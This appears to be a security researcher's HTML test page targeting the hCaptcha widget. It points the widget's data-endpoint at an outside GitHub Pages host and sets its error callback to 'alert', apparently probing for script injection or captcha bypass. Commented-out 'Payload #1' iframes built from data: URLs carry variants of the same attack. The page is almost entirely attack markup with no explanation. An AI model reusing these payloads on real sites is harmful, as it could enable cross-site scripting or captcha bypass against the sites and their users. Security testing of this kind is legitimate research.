<!DOCTYPE html>
<html>
<head>
    <!--<meta http-quiv='Content-Security-Policy' content="script-src 'self' 'https://code.jquery.com/jquery-2.2.4.min.js'" />-->
    <script src="https://js.hcaptcha.com/1/api.js"/>
</head>
<body>
<div id="captcha-1"></div>
<div class='h-captcha' data-sitekey='key1' data-endpoint='//flashitt.github.io/' data-error-callback='alert'>
<!--<script src="https://js.hcaptcha.com/1/api.js?onload=yourFunction&render=explicit"></script>-->
<!--Payload #1-->
<!--<iframe src="data:text/html,<script src='https://hcaptcha.com/1/api.js'></script><div class='h-captcha' data-sitekey='key1' data-endpoint='//flashitt.github.io/' data-error-callback='alert'></div>"></iframe>-->

<!--<iframe src="data:text/html,<script type='text/javascript'>hcaptcha.execute().then(({response,key})=>{alert('pass');}).catch(err=>{alert('fail');});</script>"></iframe>-->
</body>
</html>


